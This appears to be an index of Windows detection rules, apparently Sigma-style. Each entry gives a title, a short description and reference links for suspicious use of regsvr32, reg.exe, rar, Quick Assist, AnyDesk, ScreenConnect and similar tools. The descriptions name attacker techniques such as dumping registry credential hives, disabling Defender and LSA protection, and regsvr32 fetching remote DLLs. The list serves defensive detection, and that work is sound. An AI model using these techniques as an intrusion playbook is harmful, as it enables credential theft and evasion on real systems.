Python Spawning Pretty TTY on Windows |
Detects python spawning a pretty tty |
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Potentially Suspicious Usage Of Qemu |
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
|
https://securelist.com/network-tunneling-with-qemu/111803/, https://www.qemu.org/docs/master/system/invocation.html#hxtool-5 |
Query Usage To Exfil Data |
Detects usage of "query.exe", a system binary, to exfil information such as "sessions" and "processes" for later use |
https://twitter.com/MichalKoczwara/status/1553634816016498688 |
QuickAssist Execution |
Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
|
https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist |
Rar Usage with Password and Compression Level |
Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. |
https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/, https://ss64.com/bash/rar.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Files Added To An Archive Using Rar.EXE |
Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md, https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html |
Suspicious Greedy Compression Using Rar.EXE |
Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes |
https://decoded.avast.io/martinchlumecky/png-steganography |
Suspicious RASdial Activity |
Detects suspicious processes related to rasdial.exe |
https://twitter.com/subTee/status/891298217907830785 |
Process Memory Dump via RdrLeakDiag.EXE |
Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory |
https://www.pureid.io/dumping-abusing-windows-credentials-part-1/, https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/, https://twitter.com/0gtweet/status/1299071304805560321?s=21, https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive |
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension |
Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. |
https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ |
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location |
Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location |
https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ |
Exports Critical Registry Keys To a File |
Detects the export of a critical Registry key to a file. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Exports Registry Key To a File |
Detects the export of the target Registry key to a file. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Imports Registry Key From a File |
Detects the import of the specified file to the registry with regedit.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Imports Registry Key From an ADS |
Detects the import of an alternate data stream to the registry with regedit.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Regedit as Trusted Installer |
Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe |
https://twitter.com/1kwpeter/status/1397816101455765504 |
Suspicious Registry Modification From ADS Via Regini.EXE |
Detects the import of an alternate data stream with regini.exe; regini.exe can be used to modify registry keys. |
https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini |
Registry Modification Via Regini.EXE |
Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files. |
https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini |
DLL Execution Via Register-cimprovider.exe |
Detects the use of register-cimprovider.exe to execute an arbitrary DLL file. |
https://twitter.com/PhilipTsukerman/status/992021361106268161, https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/ |
Enumeration for 3rd Party Creds From CLI |
Detects processes that query, via the command line, known 3rd party registry keys that hold credentials |
https://isc.sans.edu/diary/More+Data+Exfiltration/25698, https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt, https://github.com/HyperSine/how-does-MobaXterm-encrypt-password, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry |
Suspicious Debugger Registration Cmdline |
Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). |
https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ |
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI |
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
|
https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content |
Potential Persistence Via Logon Scripts - CommandLine |
Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence |
https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html |
Potential Credential Dumping Attempt Using New NetworkProvider - CLI |
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it |
https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy |
Python Function Execution Security Warning Disabled In Excel |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
|
https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327 |
Potential Privilege Escalation via Service Permissions Weakness |
Detects modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ |
Potential Provisioning Registry Key Abuse For Binary Proxy Execution |
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Potential PowerShell Execution Policy Tampering - ProcCreation |
Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine |
https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 |
Hiding User Account Via SpecialAccounts Registry Key - CommandLine |
Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
|
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/, https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/, https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Persistence Via TypedPaths - CommandLine |
Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt |
https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html |
Potential Regsvr32 Commandline Flag Anomaly |
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. |
https://twitter.com/sbousseaden/status/1282441816986484737?s=12 |
Potentially Suspicious Regsvr32 HTTP IP Pattern |
Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. |
https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ |
Potentially Suspicious Regsvr32 HTTP/FTP Pattern |
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. |
https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ |
Suspicious Regsvr32 Execution From Remote Share |
Detects REGSVR32.exe executing a DLL hosted on a remote share |
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ |
Potentially Suspicious Child Process Of Regsvr32 |
Detects potentially suspicious child processes of "regsvr32.exe". |
https://redcanary.com/blog/intelligence-insights-april-2022/, https://www.echotrail.io/insights/search/regsvr32.exe, https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo |
Regsvr32 Execution From Potential Suspicious Location |
Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. |
https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Regsvr32 Execution From Highly Suspicious Location |
Detects execution of regsvr32 where the DLL is located in a highly suspicious location |
Internal Research |
Regsvr32 DLL Execution With Suspicious File Extension |
Detects the execution of REGSVR32.exe with DLL files masquerading as other files |
https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/, https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://guides.lib.umich.edu/c.php?g=282942&p=1885348 |
Scripting/CommandLine Process Spawned Regsvr32 |
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. |
https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Regsvr32 DLL Execution With Uncommon Extension |
Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. |
https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Potential Persistence Attempt Via Run Keys Using Reg.EXE |
Detects a suspicious reg.exe command line adding a key to the Run key in the Registry |
https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/, https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys |
Add SafeBoot Keys Via Reg Utility |
Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow ransomware to run in safe mode, as some security products do not run there |
https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ |
Suspicious Reg Add BitLocker |
Detects suspicious addition to BitLocker related registry keys via the reg.exe utility |
https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ |
Dropping Of Password Filter DLL |
Detects dropping of DLL files in system32 that may be used to retrieve user credentials from LSASS |
https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/, https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter |
SafeBoot Registry Key Deleted Via Reg.EXE |
Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attackers to prevent security products from running in safe boot |
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html |
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE |
Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/ |
Service Registry Key Deleted Via Reg.EXE |
Detects execution of "reg.exe" commands with the "delete" flag on service registry keys. Often used by attackers to remove AV software services |
https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
Potentially Suspicious Desktop Background Change Using Reg.EXE |
Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
|
https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI |
Direct Autorun Keys Modification |
Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md |
Security Service Disabled Via Reg.EXE |
Detects execution of "reg.exe" to disable security services such as Windows Defender. |
https://twitter.com/JohnLaTwC/status/1415295021041979392, https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1, https://vms.drweb.fr/virus/?i=24144899, https://bidouillesecurity.com/disable-windows-defender-in-powershell/ |
Dumping of Sensitive Hives Via Reg.EXE |
Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md, https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets |
Windows Recall Feature Enabled Via Reg.EXE |
Detects the enabling of the Windows Recall feature via registry manipulation.
Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Potential Suspicious Registry File Imported Via Reg.EXE |
Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import |
LSA PPL Protection Disabled Via Reg.EXE |
Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process |
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ |
Modify Group Policy Settings |
Detects malicious GPO modifications, which can be used to implement many other malicious behaviors. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md |
Suspicious Reg Add Open Command |
Detects threat actors dumping the SAM, SECURITY and SYSTEM registry hives using the DelegateExecute key |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
Enumeration for Credentials in Registry |
Adversaries may search the Registry on compromised systems for insecurely stored credentials.
The Windows Registry stores configuration information that can be used by the system or other programs.
Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md |
Enable LM Hash Storage - ProcCreation |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
|
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/ |
RestrictedAdminMode Registry Value Tampering - ProcCreation |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.
|
https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Detected Windows Software Discovery |
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts |
Potential Tampering With RDP Related Registry Keys Via Reg.EXE |
Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Potential Configuration And Service Reconnaissance Via Reg.EXE |
Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md |
Suspicious ScreenSave Change by Reg.exe |
Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
Changing Existing Service ImagePath Value Via Reg.EXE |
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions of the registry to redirect from the originally specified executable to one that they control, in order to launch their own code at service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe |
Reg Add Suspicious Paths |
Detects when an adversary uses the reg.exe utility to add or modify registry keys or subkeys |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Disabled Volume Snapshots |
Detects commands that temporarily turn off Volume Snapshots |
https://twitter.com/0gtweet/status/1354766164166115331 |
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE |
Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection |
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/, https://github.com/swagkarna/Defeat-Defender-V1.2.0, https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 |
Write Protect For Storage Disabled |
Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
|
https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html |
Suspicious Query of MachineGUID |
Detects the use of reg.exe to query MachineGuid information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery |
Remote Access Tool - AnyDesk Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Remote Access Tool - AnyDesk Piped Password Via CLI |
Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - AnyDesk Silent Installation |
Detects AnyDesk Remote Desktop silent installation, which can be used by attackers to gain remote access. |
https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20, https://support.anydesk.com/Automatic_Deployment |
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate |
Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
Use this rule to detect instances of older versions of Anydesk using the compromised certificate.
This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
|
https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/, https://anydesk.com/en/changelog/windows |
Remote Access Tool - Anydesk Execution From Suspicious Folder |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Remote Access Tool - RURAT Execution From Unusual Location |
Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - MeshAgent Command Execution via MeshCentral |
Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
|
https://github.com/Ylianst/MeshAgent, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55 |
Remote Access Tool - NetSupport Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md |
Remote Access Tool - NetSupport Execution From Unusual Location |
Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - GoToAssist Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows |
Remote Access Tool - LogMeIn Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows |
Remote Access Tool - ScreenConnect Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows |
Remote Access Tool - ScreenConnect Installation Execution |
Detects ScreenConnect program starts that establish remote access to a system. |
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies |
Remote Access Tool - ScreenConnect Remote Command Execution |
Detects the execution of a system command via the ScreenConnect RMM service. |
https://github.com/SigmaHQ/sigma/pull/4467 |
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution |
Detects potentially suspicious child processes launched via the ScreenConnect client service.
|
https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708, https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html |
Remote Access Tool - ScreenConnect Server Web Shell Execution |
Detects potential web shell execution from the ScreenConnect server process. |
https://blackpointcyber.com/resources/blog/breaking-through-the-screen/, https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 |
Remote Access Tool - Simple Help Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Remote Access Tool - Team Viewer Session Started On Windows Host |
Detects the command line executed when TeamViewer starts a session initiated by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Remote Access Tool - UltraViewer Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md |
Discovery of a System Time |
Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. |
https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md |
Renamed AdFind Execution |
Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain. |
